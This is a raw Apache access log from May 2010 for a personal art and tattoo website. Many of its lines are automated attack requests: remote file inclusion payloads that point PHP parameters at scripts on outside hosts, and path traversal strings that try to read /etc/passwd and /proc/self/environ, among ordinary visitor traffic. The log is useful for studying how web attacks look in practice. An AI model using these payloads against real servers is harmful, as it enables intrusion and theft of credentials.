87.252.3.123 - - [15/May/2010:05:43:42 -0500] "GET /API_HOME_DIR=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 328 "-""libwww-perl/5.808"
87.252.3.123 - - [15/May/2010:05:43:43 -0500] "GET /logs/API_HOME_DIR=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 333 "-""libwww-perl/5.808"
87.252.3.123 - - [15/May/2010:05:45:17 -0500] "GET /API_HOME_DIR=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 328 "-""libwww-perl/5.808"
87.252.3.123 - - [15/May/2010:05:45:17 -0500] "GET /logs/API_HOME_DIR=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 333 "-""libwww-perl/5.808"
216.18.201.130 - - [15/May/2010:05:46:17 -0500] "GET //?root=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
216.18.201.130 - - [15/May/2010:05:46:17 -0500] "GET /logs/access_log.1262390400//?root=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
216.18.201.130 - - [15/May/2010:05:46:17 -0500] "GET /logs//?root=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 5643 "-""Mozilla/5.0"
213.251.189.205 - - [15/May/2010:05:46:21 -0500] "GET //?root=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
213.251.189.205 - - [15/May/2010:05:46:21 -0500] "GET /logs//?root=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 5643 "-""Mozilla/5.0"
213.251.189.205 - - [15/May/2010:05:46:21 -0500] "GET /logs/access_log.1262390400//?root=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
210.174.163.182 - - [15/May/2010:05:46:43 -0500] "GET /config.inc.php?path_escape=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.808"
210.174.163.182 - - [15/May/2010:05:46:43 -0500] "GET /logs/config.inc.php?path_escape=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 303 "-""libwww-perl/5.808"
216.18.201.130 - - [15/May/2010:05:46:49 -0500] "GET /logs/access_log.1270857600//?root=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
216.18.201.130 - - [15/May/2010:05:46:49 -0500] "GET //?root=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
216.18.201.130 - - [15/May/2010:05:46:49 -0500] "GET /logs//?root=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 5643 "-""Mozilla/5.0"
213.251.189.205 - - [15/May/2010:05:47:01 -0500] "GET //?root=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
213.251.189.205 - - [15/May/2010:05:47:01 -0500] "GET /logs//?root=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 5643 "-""Mozilla/5.0"
213.251.189.205 - - [15/May/2010:05:47:01 -0500] "GET /logs/access_log.1270857600//?root=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
210.174.163.182 - - [15/May/2010:05:47:08 -0500] "GET //stats.inc.php?prefix=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.808"
210.174.163.182 - - [15/May/2010:05:47:09 -0500] "GET /logs//stats.inc.php?prefix=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 303 "-""libwww-perl/5.808"
218.48.202.44 - - [15/May/2010:05:48:49 -0500] "GET //errors.php?error=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
218.48.202.44 - - [15/May/2010:05:48:49 -0500] "GET /logs//errors.php?error=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
87.250.255.243 - - [15/May/2010:05:52:02 -0500] "GET /logs/access_log.1242777600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
111.89.128.186 - - [15/May/2010:05:52:11 -0500] "GET //pop3.php?CONFIG[pear_dir]=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
111.89.128.186 - - [15/May/2010:05:52:11 -0500] "GET /logs//pop3.php?CONFIG[pear_dir]=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
218.48.202.44 - - [15/May/2010:05:53:51 -0500] "GET //userLog.php?rootSys=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
218.48.202.44 - - [15/May/2010:05:53:51 -0500] "GET /logs//userLog.php?rootSys=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
207.46.199.193 - - [15/May/2010:05:54:23 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
218.48.202.44 - - [15/May/2010:05:57:26 -0500] "GET //errors.php?error=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
218.48.202.44 - - [15/May/2010:05:57:26 -0500] "GET /logs//errors.php?error=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
111.89.128.186 - - [15/May/2010:05:58:12 -0500] "GET //errors.php?error=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
111.89.128.186 - - [15/May/2010:05:58:12 -0500] "GET /logs//errors.php?error=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
193.205.5.6 - - [15/May/2010:05:58:51 -0500] "GET /logs/access_log.1273276800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.820"
193.205.5.6 - - [15/May/2010:05:58:52 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.820"
193.205.5.6 - - [15/May/2010:05:58:52 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.820"
210.174.163.182 - - [15/May/2010:05:59:15 -0500] "GET /?pathtoashnews=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 200 1003 "-""libwww-perl/5.808"
210.174.163.182 - - [15/May/2010:05:59:15 -0500] "GET /logs/?pathtoashnews=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 200 5638 "-""libwww-perl/5.808"
83.38.237.49 - - [15/May/2010:06:00:44 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.es/search?q=vintage+flash.com&hl=es&rlz=1W1SUNC_es&start=20&sa=N""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322)"
83.38.237.49 - - [15/May/2010:06:00:45 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322)"
83.38.237.49 - - [15/May/2010:06:00:47 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322)"
210.174.163.182 - - [15/May/2010:06:01:23 -0500] "GET //errors.php?error=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.808"
210.174.163.182 - - [15/May/2010:06:01:23 -0500] "GET /logs//errors.php?error=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.808"
77.77.19.252 - - [15/May/2010:06:01:25 -0500] "GET /logs/access_log.1265241600 HTTP/1.1" 404 310 "http://www.bing.com/search?q=windows+oe+certpage+aspx&first=11&FORM=PORE""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
77.77.19.252 - - [15/May/2010:06:01:29 -0500] "GET / HTTP/1.1" 200 1003 "http://tomdolan.pconline.com/logs/access_log.1265241600""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
77.77.19.252 - - [15/May/2010:06:01:29 -0500] "GET /icons/blank.gif HTTP/1.1" 200 148 "http://tomdolan.pconline.com/""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
77.77.19.252 - - [15/May/2010:06:01:29 -0500] "GET /icons/back.gif HTTP/1.1" 200 216 "http://tomdolan.pconline.com/""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
77.77.19.252 - - [15/May/2010:06:01:29 -0500] "GET /icons/folder.gif HTTP/1.1" 200 225 "http://tomdolan.pconline.com/""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
77.77.19.252 - - [15/May/2010:06:01:39 -0500] "GET / HTTP/1.1" 200 1003 "http://tomdolan.pconline.com/""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
77.77.19.252 - - [15/May/2010:06:01:42 -0500] "GET /artwork/ HTTP/1.1" 200 11078 "http://tomdolan.pconline.com/""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
77.77.19.252 - - [15/May/2010:06:01:42 -0500] "GET /artwork/teagle.jpg HTTP/1.1" 200 4731 "http://tomdolan.pconline.com/artwork/""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
77.77.19.252 - - [15/May/2010:06:01:43 -0500] "GET /artwork/tblocks2.jpg HTTP/1.1" 200 6812 "http://tomdolan.pconline.com/artwork/""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
77.77.19.252 - - [15/May/2010:06:01:43 -0500] "GET /artwork/tcarousel4.jpg HTTP/1.1" 200 7475 "http://tomdolan.pconline.com/artwork/""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
77.77.19.252 - - [15/May/2010:06:01:43 -0500] "GET /artwork/tmgblkpz1.jpg HTTP/1.1" 200 3807 "http://tomdolan.pconline.com/artwork/""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
77.77.19.252 - - [15/May/2010:06:01:43 -0500] "GET /artwork/tinvisible1.jpg HTTP/1.1" 200 5429 "http://tomdolan.pconline.com/artwork/""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
77.77.19.252 - - [15/May/2010:06:01:43 -0500] "GET /artwork/tdylan-tenement1a.jpg HTTP/1.1" 200 5826 "http://tomdolan.pconline.com/artwork/""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
77.77.19.252 - - [15/May/2010:06:01:43 -0500] "GET /artwork/tplayhouse-h15.jpg HTTP/1.1" 200 8241 "http://tomdolan.pconline.com/artwork/""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
77.77.19.252 - - [15/May/2010:06:01:43 -0500] "GET /artwork/tartmaster-side2d.jpg HTTP/1.1" 200 4141 "http://tomdolan.pconline.com/artwork/""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
77.77.19.252 - - [15/May/2010:06:01:43 -0500] "GET /artwork/tUncleSam_mirror.jpg HTTP/1.1" 200 7361 "http://tomdolan.pconline.com/artwork/""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
77.77.19.252 - - [15/May/2010:06:01:43 -0500] "GET /artwork/tcaboose-trunk.jpg HTTP/1.1" 200 4548 "http://tomdolan.pconline.com/artwork/""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
77.77.19.252 - - [15/May/2010:06:01:43 -0500] "GET /artwork/tfishchair1.jpg HTTP/1.1" 200 5054 "http://tomdolan.pconline.com/artwork/""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
77.77.19.252 - - [15/May/2010:06:01:43 -0500] "GET /artwork/tcart.jpg HTTP/1.1" 200 5518 "http://tomdolan.pconline.com/artwork/""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
77.77.19.252 - - [15/May/2010:06:01:43 -0500] "GET /artwork/tark-menorrah.jpg HTTP/1.1" 200 6512 "http://tomdolan.pconline.com/artwork/""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
77.77.19.252 - - [15/May/2010:06:01:44 -0500] "GET /artwork/tbig-catch-diorama.jpg HTTP/1.1" 200 8571 "http://tomdolan.pconline.com/artwork/""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
77.77.19.252 - - [15/May/2010:06:01:44 -0500] "GET /artwork/tjewelrybox-ballerina1.jpg HTTP/1.1" 200 3689 "http://tomdolan.pconline.com/artwork/""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
77.77.19.252 - - [15/May/2010:06:01:44 -0500] "GET /artwork/tunclesamwhilrligig.jpg HTTP/1.1" 200 6165 "http://tomdolan.pconline.com/artwork/""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
77.77.19.252 - - [15/May/2010:06:01:44 -0500] "GET /artwork/tcattar.jpg HTTP/1.1" 200 4023 "http://tomdolan.pconline.com/artwork/""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
77.77.19.252 - - [15/May/2010:06:01:44 -0500] "GET /artwork/tmobile-gun.jpg HTTP/1.1" 200 6391 "http://tomdolan.pconline.com/artwork/""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
77.77.19.252 - - [15/May/2010:06:01:45 -0500] "GET /artwork/gate.png HTTP/1.1" 200 47886 "http://tomdolan.pconline.com/artwork/""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
77.77.19.252 - - [15/May/2010:06:01:45 -0500] "GET /artwork/can-usa-mex-postcard1.jpg HTTP/1.1" 200 58685 "http://tomdolan.pconline.com/artwork/""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
77.77.19.252 - - [15/May/2010:06:01:45 -0500] "GET /artwork/tpig_9men.jpg HTTP/1.1" 200 8552 "http://tomdolan.pconline.com/artwork/""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
77.77.19.252 - - [15/May/2010:06:01:45 -0500] "GET /artwork/tcat-cofin.jpg HTTP/1.1" 200 7218 "http://tomdolan.pconline.com/artwork/""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
218.48.202.44 - - [15/May/2010:06:05:23 -0500] "GET //core.php?root=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
218.48.202.44 - - [15/May/2010:06:05:23 -0500] "GET /logs//core.php?root=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
111.89.128.186 - - [15/May/2010:06:06:13 -0500] "GET //errors.php?error=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
111.89.128.186 - - [15/May/2010:06:06:14 -0500] "GET /logs//errors.php?error=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
87.250.255.243 - - [15/May/2010:06:06:26 -0500] "GET /logs/access_log.1243728000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
216.150.224.151 - - [15/May/2010:06:10:40 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 302 "-""Mozilla/5.0"
216.150.224.151 - - [15/May/2010:06:10:40 -0500] "GET /logs/access_log.1217376000//s_loadenv.inc.php?DOCUMENT_ROOT=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 329 "-""Mozilla/5.0"
216.150.224.151 - - [15/May/2010:06:10:40 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 307 "-""Mozilla/5.0"
114.108.151.149 - - [15/May/2010:06:12:56 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
114.108.151.149 - - [15/May/2010:06:12:56 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [15/May/2010:06:12:57 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
211.174.62.150 - - [15/May/2010:06:13:14 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
211.174.62.150 - - [15/May/2010:06:13:14 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
211.174.62.150 - - [15/May/2010:06:13:14 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
211.174.62.150 - - [15/May/2010:06:13:14 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
211.174.62.150 - - [15/May/2010:06:13:14 -0500] "GET /logs/access_log.1217376000//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
211.174.62.150 - - [15/May/2010:06:13:14 -0500] "GET /logs/access_log.1217376000//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
114.108.151.149 - - [15/May/2010:06:13:24 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
207.46.204.231 - - [15/May/2010:06:17:39 -0500] "GET /logs/access_log.1261094400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.121.71.175 - - [15/May/2010:06:18:06 -0500] "GET /logs/access_log.1273190400%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 355 "-""Mozilla/5.0"
91.121.71.175 - - [15/May/2010:06:18:06 -0500] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
91.121.71.175 - - [15/May/2010:06:18:06 -0500] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
216.150.224.151 - - [15/May/2010:06:19:33 -0500] "GET /logs/access_log.1217376000%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 331 "-""Mozilla/5.0"
218.48.202.44 - - [15/May/2010:06:19:35 -0500] "GET //errors.php?error=%0Did.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
218.48.202.44 - - [15/May/2010:06:19:36 -0500] "GET /logs//errors.php?error=%0Did.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
218.48.202.44 - - [15/May/2010:06:21:49 -0500] "GET //errors.php?error=%0Did.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
218.48.202.44 - - [15/May/2010:06:21:49 -0500] "GET /logs//errors.php?error=%0Did.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
65.75.54.32 - - [15/May/2010:06:21:55 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
65.75.54.32 - - [15/May/2010:06:21:55 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
65.75.54.32 - - [15/May/2010:06:21:56 -0500] "GET /logs/access_log.1217376000//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
218.48.202.44 - - [15/May/2010:06:22:02 -0500] "GET //errors.php?error=%0Did.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
218.48.202.44 - - [15/May/2010:06:22:02 -0500] "GET /logs//errors.php?error=%0Did.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
218.48.202.44 - - [15/May/2010:06:22:22 -0500] "GET //errors.php?error=%0Did.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
218.48.202.44 - - [15/May/2010:06:22:31 -0500] "GET /logs//errors.php?error=%0Did.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
211.174.62.150 - - [15/May/2010:06:23:06 -0500] "GET /logs/access_log.1217376000%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
210.174.163.182 - - [15/May/2010:06:24:08 -0500] "GET /?pathtoashnews=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 200 1003 "-""libwww-perl/5.808"
210.174.163.182 - - [15/May/2010:06:24:09 -0500] "GET /logs/?pathtoashnews=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 200 5638 "-""libwww-perl/5.808"
111.89.128.186 - - [15/May/2010:06:25:06 -0500] "GET //errors.php?error=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
111.89.128.186 - - [15/May/2010:06:25:06 -0500] "GET /logs//errors.php?error=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
211.174.62.150 - - [15/May/2010:06:25:11 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://no.no-ip.com/images/id1.txt???? HTTP/1.1" 404 302 "-""Mozilla/5.0"
211.174.62.150 - - [15/May/2010:06:25:11 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://no.no-ip.com/images/id1.txt???? HTTP/1.1" 404 307 "-""Mozilla/5.0"
211.174.62.150 - - [15/May/2010:06:25:11 -0500] "GET /logs/access_log.1217376000%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://no.no-ip.com/images/id1.txt???? HTTP/1.1" 404 331 "-""Mozilla/5.0"
211.174.62.150 - - [15/May/2010:06:25:20 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://no.no-ip.com/images/id1.txt???? HTTP/1.1" 404 302 "-""Mozilla/5.0"
211.174.62.150 - - [15/May/2010:06:25:20 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://no.no-ip.com/images/id1.txt???? HTTP/1.1" 404 307 "-""Mozilla/5.0"
211.174.62.150 - - [15/May/2010:06:25:20 -0500] "GET /logs/access_log.1217376000%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://no.no-ip.com/images/id1.txt???? HTTP/1.1" 404 331 "-""Mozilla/5.0"
87.250.255.243 - - [15/May/2010:06:26:35 -0500] "GET /logs/access_log.1193270400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
210.174.163.182 - - [15/May/2010:06:28:21 -0500] "GET /CONFIG[MWCHAT_Libs]=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 335 "-""libwww-perl/5.808"
210.174.163.182 - - [15/May/2010:06:28:21 -0500] "GET /logs/CONFIG[MWCHAT_Libs]=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 340 "-""libwww-perl/5.808"
65.75.54.32 - - [15/May/2010:06:30:37 -0500] "GET /logs/access_log.1217376000//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
65.75.54.32 - - [15/May/2010:06:30:37 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
65.75.54.32 - - [15/May/2010:06:30:37 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
218.48.202.44 - - [15/May/2010:06:32:18 -0500] "GET //errors.php?error=%0Did.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
218.48.202.44 - - [15/May/2010:06:32:19 -0500] "GET /logs//errors.php?error=%0Did.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
64.34.162.143 - - [15/May/2010:06:33:11 -0500] "GET /logs/access_log.1273276800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
64.34.162.143 - - [15/May/2010:06:33:16 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
64.34.162.143 - - [15/May/2010:06:33:16 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
207.46.199.38 - - [15/May/2010:06:33:39 -0500] "GET /logs/access_log.1249689600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
92.241.190.214 - - [15/May/2010:06:39:02 -0500] "GET /logs/access_log.1272844800%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.shilohuccyorkpa.org/logs/id.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
92.241.190.214 - - [15/May/2010:06:39:02 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.shilohuccyorkpa.org/logs/id.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
92.241.190.214 - - [15/May/2010:06:39:02 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.shilohuccyorkpa.org/logs/id.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
92.241.190.214 - - [15/May/2010:06:39:59 -0500] "GET /logs/access_log.1272844800//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.shilohuccyorkpa.org/logs/id.txt? HTTP/1.1" 404 358 "-""Mozilla/5.0"
114.108.151.149 - - [15/May/2010:06:40:14 -0500] "GET /logs/access_log.1273276800/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
114.108.151.149 - - [15/May/2010:06:40:14 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [15/May/2010:06:40:14 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
92.241.190.214 - - [15/May/2010:06:40:49 -0500] "GET /logs/access_log.1272844800//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.shilohuccyorkpa.org/images/result.jpg?? HTTP/1.1" 404 358 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
92.241.190.214 - - [15/May/2010:06:40:49 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.shilohuccyorkpa.org/images/result.jpg?? HTTP/1.1" 404 331 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
92.241.190.214 - - [15/May/2010:06:40:50 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.shilohuccyorkpa.org/images/result.jpg?? HTTP/1.1" 404 336 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
210.174.163.182 - - [15/May/2010:06:41:14 -0500] "GET /lang_settings[0][1]=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 335 "-""libwww-perl/5.808"
